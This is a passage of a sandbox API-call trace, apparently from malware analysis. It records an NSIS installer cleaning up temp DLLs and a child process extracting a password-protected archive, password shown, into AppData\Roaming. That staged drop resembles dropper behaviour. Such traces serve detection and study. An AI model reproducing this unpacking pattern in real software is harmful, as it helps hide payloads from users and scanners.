[0160.561] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0160.561] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.561] lstrlenA (lpString="C:\\Users\\ADU0VK~1") returned 17 [0160.561] FindFirstFileA (in: lpFileName="C:\\Users", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0160.562] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.562] lstrlenA (lpString="C:\\Users") returned 8 [0160.562] lstrcatA (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.562] GetFileAttributesA (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0160.562] lstrcpynA (in: lpString1=0x42b878, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.562] lstrcatA (in: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="\\*.*" | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\*.*") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\*.*" [0160.562] lstrcatA (in: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="\\" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\" [0160.562] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\") returned 49 [0160.562] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\*.*", lpFindFileData=0x18fc98 | out: lpFindFileData=0x18fc98) returned 0x2e7a78 [0160.562] SetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll", dwFileAttributes=0x2020) returned 1 [0160.562] DeleteFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\nsexec.dll")) returned 1 [0160.563] FindNextFileA (in: hFindFile=0x2e7a78, lpFindFileData=0x18fc98 | out: lpFindFileData=0x18fc98) returned 1 [0160.563] SetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", dwFileAttributes=0x2020) returned 1 [0160.563] DeleteFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 1 [0160.563] FindNextFileA (in: hFindFile=0x2e7a78, lpFindFileData=0x18fc98 | out: lpFindFileData=0x18fc98) returned 1 [0160.563] SetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\UserInfo.dll", dwFileAttributes=0x2020) returned 1 [0160.564] DeleteFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\UserInfo.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\userinfo.dll")) returned 1 [0160.564] FindNextFileA (in: 
hFindFile=0x2e7a78, lpFindFileData=0x18fc98 | out: lpFindFileData=0x18fc98) returned 0 [0160.564] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.564] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0160.564] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0160.564] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0160.564] lstrcatA (in: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="\\" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\" [0160.564] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp")) returned 0x2010 [0160.564] SetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\", dwFileAttributes=0x2010) returned 1 [0160.565] RemoveDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp")) returned 1 [0160.565] OleUninitialize () [0160.566] ExitProcess (uExitCode=0x0) Thread: id = 55 os_tid = 0x818 Thread: id = 56 os_tid = 0x94 Process: id = "5" image_name = "a.exe" filename = "c:\\users\\adu0vk~1\\appdata\\local\\temp\\a.exe" page_root = "0x77a26000" os_pid = "0x454" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x4c8" cmd_line = "A.exe x B.7z -psL3117nTGnp393SLZxZy -o\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\" -aoa" cur_dir = "C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], 
"BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 998 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 999 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1000 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1001 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1002 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1003 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1004 start_va = 0x400000 end_va = 0x499fff entry_point = 0x400000 region_type = mapped_file name = "a.exe" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\A.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\a.exe") Region: id = 1005 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1006 start_va = 0x77d30000 end_va = 0x77eaffff entry_point = 0x77d30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1007 start_va = 0x7efb0000 end_va = 
0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1008 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1009 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1010 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1011 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1012 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1013 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1014 start_va = 0x690000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1015 start_va = 0x755d0000 end_va = 0x755d7fff entry_point = 0x755d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1016 start_va = 0x755e0000 end_va = 0x7563bfff entry_point = 0x755e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1017 start_va = 0x75640000 end_va = 0x7567efff entry_point = 0x75640000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1018 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" 
Region: id = 1019 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1020 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1021 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1022 start_va = 0x900000 end_va = 0x9fffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1023 start_va = 0x75880000 end_va = 0x7588bfff entry_point = 0x75880000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1024 start_va = 0x75890000 end_va = 0x758effff entry_point = 0x75890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1025 start_va = 0x75a10000 end_va = 0x75a55fff entry_point = 0x75a10000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1026 start_va = 0x75a60000 end_va = 0x75bbbfff entry_point = 0x75a60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1027 start_va = 0x75bc0000 end_va = 0x75c6bfff entry_point = 0x75bc0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1028 start_va = 0x75c90000 end_va = 0x75d9ffff entry_point = 0x75c90000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" 
(normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1029 start_va = 0x75f20000 end_va = 0x7600ffff entry_point = 0x75f20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1030 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x76650000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1031 start_va = 0x76780000 end_va = 0x7687ffff entry_point = 0x76780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1032 start_va = 0x774d0000 end_va = 0x7756cfff entry_point = 0x774d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1033 start_va = 0x77600000 end_va = 0x7768ffff entry_point = 0x77600000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1034 start_va = 0x777f0000 end_va = 0x77808fff entry_point = 0x777f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1035 start_va = 0x77810000 end_va = 0x7789efff entry_point = 0x77810000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1036 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x0 region_type = private name = "private_0x0000000077930000" filename = "" Region: id = 1037 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x0 region_type = private name = "private_0x0000000077a50000" filename = "" Region: id = 1038 start_va = 0x77d00000 end_va = 
0x77d09fff entry_point = 0x77d00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1039 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1040 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1041 start_va = 0x230000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1042 start_va = 0x76050000 end_va = 0x7611bfff entry_point = 0x76050000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1043 start_va = 0x77790000 end_va = 0x777effff entry_point = 0x77790000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1044 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1045 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1046 start_va = 0x4a0000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1047 start_va = 0x710000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1048 start_va = 0xa00000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Thread: id = 57 os_tid = 0x764 [0159.161] GetVersion () returned 0x1db10106 [0159.162] GetVersionExA (in: lpVersionInformation=0x18feb4*(dwOSVersionInfoSize=0x94, 
dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x100000, dwPlatformId=0x2000, szCSDVersion="") | out: lpVersionInformation=0x18feb4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0159.163] GetCurrentThreadId () returned 0x764 [0159.163] GetStartupInfoA (in: lpStartupInfo=0x18ff0c | out: lpStartupInfo=0x18ff0c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1a0, hStdOutput=0x198, hStdError=0x198)) [0159.163] GetStdHandle (nStdHandle=0xfffffff6) returned 0x1a0 [0159.163] GetFileType (hFile=0x1a0) returned 0x3 [0159.163] GetStdHandle (nStdHandle=0xfffffff5) returned 0x198 [0159.163] GetFileType (hFile=0x198) returned 0x3 [0159.163] GetStdHandle (nStdHandle=0xfffffff4) returned 0x198 [0159.163] GetFileType (hFile=0x198) returned 0x3 [0159.163] SetHandleCount (uNumber=0x20) returned 0x20 [0159.163] GetCommandLineA () returned="A.exe x B.7z -psL3117nTGnp393SLZxZy -o\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\" -aoa" [0159.163] GetEnvironmentStringsW () returned 0x914a00* [0159.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1493, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1493 [0159.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1493, lpMultiByteStr=0x790ce0, cbMultiByte=1493, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1493 [0159.164] FreeEnvironmentStringsW (penv=0x914a00) returned 1 [0159.164] GetACP () returned 0x4e4 [0159.164] GetCPInfo (in: CodePage=0x4e4, 
lpCPInfo=0x18ff18 | out: lpCPInfo=0x18ff18) returned 1 [0159.164] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fef0 | out: lpCPInfo=0x18fef0) returned 1 [0159.164] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f9ac | out: lpCharType=0x18f9ac) returned 1 [0159.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdf0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0159.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdf0, cbMultiByte=256, lpWideCharStr=0x18f794, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ") returned 256 [0159.165] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ", cchSrc=256, lpCharType=0x18f9f0 | out: lpCharType=0x18f9f0) returned 1 [0159.165] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0159.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdf0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0159.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdf0, cbMultiByte=256, lpWideCharStr=0x18f770, cchWideChar=256 | out: 
lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ") returned 256 [0159.165] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0159.165] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ", cchSrc=256, lpDestStr=0x18f570, cchDest=256 | out: 
lpDestStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x192\x201e\x2026\x2020\x2021\x2c6\x2030\x161\x2039\x153\x8d\x17e\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x161\x203a\x153\x9d\x17e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x192\x201e\x2026\x2020\x2021\x2c6\x2030\x160\x2039\x152\x8d\x17d\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x161\x203a\x153\x9d\x17e\x178\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\x
db\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x623c\x49\x100") returned 256 [0159.165] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x220, lpWideCharStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x192\x201e\x2026\x2020\x2021\x2c6\x2030\x161\x2039\x153\x8d\x17e\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x161\x203a\x153\x9d\x17e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\x